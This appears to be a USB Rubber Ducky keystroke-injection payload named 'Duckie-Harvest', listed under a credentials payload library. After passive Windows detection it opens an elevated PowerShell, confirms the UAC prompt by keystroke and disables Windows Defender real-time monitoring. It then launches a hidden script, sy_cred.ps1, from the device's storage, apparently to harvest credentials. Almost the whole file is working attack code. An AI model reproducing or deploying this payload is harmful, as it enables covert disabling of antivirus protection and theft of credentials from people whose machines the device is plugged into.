Path: blob/master/payloads/library/credentials/Duckie-Harvest/payload.txt
2968 views
ATTACKMODE HID STORAGE1EXTENSION PASSIVE_WINDOWS_DETECT2REM VERSION 1.13REM AUTHOR: Korben45REM_BLOCK DOCUMENTATION6Windows fully passive OS Detection and passive Detect Ready7Includes its own passive detect ready.8Does not require additional extensions.910USAGE:11Extension runs inline (here)12Place at beginning of payload (besides ATTACKMODE) to act as dynamic13boot delay14$_OS will be set to WINDOWS or NOT_WINDOWS15See end of payload for usage within payload16END_REM1718REM CONFIGURATION:19DEFINE #MAX_WAIT 15020DEFINE #CHECK_INTERVAL 2021DEFINE #WINDOWS_HOST_REQUEST_COUNT 222DEFINE #NOT_WINDOWS 72324$_OS = #NOT_WINDOWS2526VAR $MAX_TRIES = #MAX_WAIT27WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))28DELAY #CHECK_INTERVAL29$MAX_TRIES = ($MAX_TRIES - 1)30END_WHILE31IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN32$_OS = WINDOWS33END_IF3435REM_BLOCK EXAMPLE USAGE AFTER EXTENSION36IF ($_OS == WINDOWS) THEN37STRING HELLO WINDOWS!38ELSE39STRING HELLO WORLD!40END_IF41END_REM42END_EXTENSION4344DEFINE #DUCKY_DRIVER_LABEL DUCKY45DEFINE #PS1 sy_cred.ps14647IF ($_OS == WINDOWS )THEN4849DELAY 20050REM -----open Powershell as Admin51GUI r52DELAY 20053STRING powershell54CTRL-SHIFT ENTER55DELAY 40056LEFT57DELAY 15058ENTER59DELAY 50060STRINGLN_POWERSHELL6162$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter63Set-MpPreference -DisableRealtimeMonitoring $true64Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden65exit6667END_STRINGLN68697071END_IF727374